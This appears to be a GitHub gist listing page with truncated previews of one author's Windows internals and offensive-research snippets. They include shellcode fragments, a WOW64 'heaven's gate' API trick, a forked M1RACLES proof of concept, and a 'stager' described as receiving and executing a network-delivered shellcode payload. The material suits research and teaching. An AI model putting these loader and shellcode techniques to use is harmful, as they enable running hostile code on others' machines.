aaaddress1
/ http_download.h
Last active
May 3, 2024 22:13
using WinHTTP to obtain binary data (MSVC)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // using WinHTTP to obtain binary data (MSVC) | |
| // by [email protected] | |
| #include <vector> | |
| #include <stdio.h> | |
| #include <windows.h> | |
| #include <Winhttp.h> | |
| #pragma comment(lib, "winhttp") | |
| using namespace std; | |
| vector<char>* httpRecv(const wchar_t url[]) { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // memcpy 32bit by [email protected] | |
| #include <stdint.h> | |
| #include <stdio.h> | |
| #include <windows.h> | |
| int main(void) { | |
| int dummy(0x41414242); | |
| char buf[8] = {0}; | |
| ((void(cdecl *)(DWORD, DWORD, DWORD))"\x8B\x7C\x24\x04\x8B\x74\x24\x08\x8B\x4C\x24\x0C\xF3\xA4\xC3")((size_t)buf, (size_t)&dummy, sizeof(dummy)); | |
| puts(buf); |
aaaddress1
/ wow64_read64Env.cpp
Created
April 20, 2021 10:37
fetch current EXE path from 64 bit PEB->Ldr (In 32 bit mode)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // fetch current EXE path from 64 bit PEB->Ldr (In 32 bit mode) | |
| // by [email protected] | |
| #include <stdint.h> | |
| #include <stdio.h> | |
| #include <windows.h> | |
| typedef struct _PEB_LDR_DATA64 | |
| { | |
| ULONG Length; | |
| BOOLEAN Initialized; | |
| ULONG64 SsHandle; |
aaaddress1
/ wow64Mem_Forensics.cpp
Last active
May 3, 2024 22:12
get 64 bit windows API address in pure 32 bit mode
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // get 64 bit Windows API in pure 32 bit mode! | |
| // it's necessary to disable all the compiler optimization if you're using MSVC. | |
| // more detail check out ReWolf's amazing trick: blog.rewolf.pl/blog/?p=102 | |
| // by [email protected] | |
| #include <iostream> | |
| #include <stdio.h> | |
| #include <windows.h> | |
| // ref: raw.githubusercontent.com/rwfpl/rewolf-wow64ext/master/src/wow64ext.h | |
| #include "wow64ext.h" |
aaaddress1
/ x96shell_msgbox.asm
Created
May 7, 2021 07:31
x96 Windows Shellcode: one payload able to used in both 32-bit & 64-bit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; x96 shellcode (x32+x64) by [email protected] | |
| ; yasm -f bin -o x96shell_msgbox x96shell_msgbox.asm | |
| section .text | |
| bits 32 | |
| _main: | |
| call entry | |
| entry: | |
| mov ax, cs | |
| sub ax, 0x23 | |
| jz retTo32b |
aaaddress1
/ x96_shellcode.py
Created
May 19, 2021 05:45
Python Script to Generate x96 Windows Shellcode
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # x96_shellcode.py | |
| # ref: gist.github.com/aaaddress1/3c0ae754f8a40024881343a085954049 | |
| # by [email protected] | |
| ''' | |
| entry: | |
| call $+5 | |
| mov ax, cs | |
| sub ax, 23h | |
| je retTo32b | |
| nop |
aaaddress1
/ m1racles-poc.c
Created
June 1, 2021 14:10
— forked from marcan/m1racles-poc.c
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * m1racle-poc: a basic proof of concept for the M1RACLES vulnerability in the Apple M1. | |
| * | |
| * This program allows you to read and write the state of the s3_5_c15_c10_1 CPU register. | |
| * | |
| * Please visit m1racles.com for more information. | |
| * | |
| * Licensed under the MIT license. | |
| */ |
aaaddress1
/ inputLockToZhTW.cpp
Created
June 2, 2021 13:26
swich IME (Input Method Editor) to Zh-TW chinese on specific window
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // [Experiment] swich IME to Traditional Chinese | |
| // $ g++ -m32 -static inputLockToZhTW.cpp && a | |
| // test on League of Legends (TW) client, but got ignored :( | |
| // by [email protected] | |
| #include <windows.h> | |
| #include <iostream> | |
| int main(void) { | |
| for (char buf[64]; ; Sleep(150)) { | |
| GetWindowTextA(GetForegroundWindow(), buf, sizeof(buf)); | |
| // once found that LOL client is on the top, and send IME change requests |
aaaddress1
/ stager.cc
Created
June 5, 2021 17:58
simple stager: using ncat to send shellcode payload, recv & execute.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // simple stager, by [email protected] | |
| // using ncat to send shellcode payload, recv & execute. | |
| #include <WS2tcpip.h> | |
| #include <stdio.h> | |
| #include <shlobj.h> | |
| #include <Windows.h> | |
| #include <shlwapi.h> | |
| #include <winsock2.h> | |
| #pragma warning(disable:4996) | |
| #pragma comment(lib, "ws2_32.lib") |
aaaddress1
/ etw_ClrTracker.cpp
Last active
May 3, 2024 22:10
use ETW (Event Tracing for Windows) to get notification of loaded CLR modules
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // ETW CLR Tracker, by [email protected] | |
| // rewrite from post "Hiding your .NET - ETW" | |
| // URL: https://blog.xpnsec.com/hiding-your-dotnet-etw/ | |
| #define AssemblyDCStart_V1 155 | |
| #define AssemblyLoad_V1 154 | |
| #define MethodLoadVerbose_V1 143 | |
| #include <windows.h> | |
| #include <stdio.h> | |
| #include <wbemidl.h> |